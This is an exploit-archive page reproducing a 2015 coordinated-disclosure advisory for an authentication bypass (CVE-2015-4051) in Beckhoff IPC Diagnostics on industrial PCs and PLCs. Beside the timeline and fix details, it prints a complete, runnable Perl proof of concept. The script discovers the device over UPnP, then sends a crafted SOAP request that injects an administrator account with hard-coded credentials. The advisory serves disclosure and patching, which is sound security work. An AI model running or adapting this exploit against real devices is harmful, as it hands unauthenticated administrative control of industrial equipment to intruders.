what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Beckhoff IPC Diagnositcs Authentication Bypass

Beckhoff IPC Diagnositcs Authentication Bypass
Posted Jun 5, 2015
Authored by Frank Lycops | Site thesecurityfactory.be

Beckhoff IPC Diagnostics versions prior to 1.8 suffer from an authentication bypass vulnerability.

tags | exploit, bypass
advisories | CVE-2015-4051
SHA-256 | c1258402de5e381e4a2cdccec967d1187990dd16ecfa6f773fdbc2ff8b3e5e29

Beckhoff IPC Diagnositcs Authentication Bypass

Change Mirror Download
Beckhoff IPC diagnostics < 1.8 : Authentication bypass
======================================================

CVE number: CVE-2015-4051
Permalink: http://www.thesecurityfactory.be/permalink/beckhoff-authentication-bypass.html
Vendor advisory: http://ftp.beckhoff.com/download/document/IndustPC/Advisory-2015-001.pdf

-- Info --


Beckhoff IPC diagnostics is support software that is preinstalled on all Beckhoff Industrial PCís (and PLCís) that are running an embedded Microsoft Windows operating system. The software enables various system diagnostics options, as well the possibility to alter various settings.

-- Affected version --

IPC Diagnostics < Version 1.8

-- Vulnerability details --

Due to a lack of authentication when making a call to /upnpisapi, an unauthenticated attacker is able to perform a variety of actions on the system by sending a specially crafted packet. These actions include rebooting the device or injecting a new user that has admin access rights on both the underlaying embedded Windows and webserver. Further access can be obtained on the system by connecting to SMB / FTP / telnet / Ö using the injected user.

-- PoC --


#!/usr/bin/perl
use IO::Socket::INET;
use strict;
use warnings;
if ($#ARGV < 0) { print "Usage: $0 ip\n"; exit(-1); }
system("clear");
print "Connecting to UPNP\n";
my $upnp_req = "M-SEARCH * HTTP/1.1\r\n" .
"Host:239.255.255.250:1900\r\n" .
"ST:upnp:rootdevice\r\n" .
"Man:\"ssdp:discover\"\r\n" .
"MX:3\r\n" .
"\r\n";
my $ip = $ARGV[0];
my $socket = new IO::Socket::INET ( PeerAddr => "$ip:1900", Proto => 'udp') or die "ERROR in Socket Creation : $!\n";
$socket->send($upnp_req);
my $usn;
while (1)
{
my $data = <$socket>;
print "$data";
# Get the USN
if ($data =~ /^USN:/) {
print "\nUSN seen. Trying to get it\n";
($usn) = $data =~ /^USN:uuid:(.*)::upnp:rootdevice/;
last;
}
}
print "\n\nUSN found: $usn\n\n";
print "Creating curl command\n\n";
my $curl_command = "curl -i -s -k -X 'POST' " .
" -H 'SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write' -H 'Content-Type: text/xml; charset=utf-8' " .
" --data-binary \$'00-1340079872KAAAAAYAAAAAAAAAEgAAAEluamVjdHRoZVNlY3VyaXR5RmFjdG9yeQAA' " .
" 'http://" . $ip . ":5120/upnpisapi?uuid:" . $usn . "+urn:beckhoff.com:serviceId:cxconfig'";
print "Executing Curl command\n\n";
system($curl_command);
print "User: Inject, Password: theSecurityFactory should be injected";


-- Solution --

This issue has been fixed as of version 1.8.1.0

-- Timeline --

2015-27-01 Vulnerability discovery and creation of PoC
2015-28-01 Vulnerability responsibly reported to vendor
2015-13-02 Second disclosure to vendor
2015-13-02 Vendor response and acknowledgement of vulnerability
2015-15-04 - 2015-15-05 Various communications
2015-21-05 Vendor update and advisory release
2015-04-06 Advisory published in coordination with vendor

-- Credits --

Frank Lycops
Frank.lycops [at] thesecurityfactory.be


Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    14 Files
  • 30
    Sep 30th
    19 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close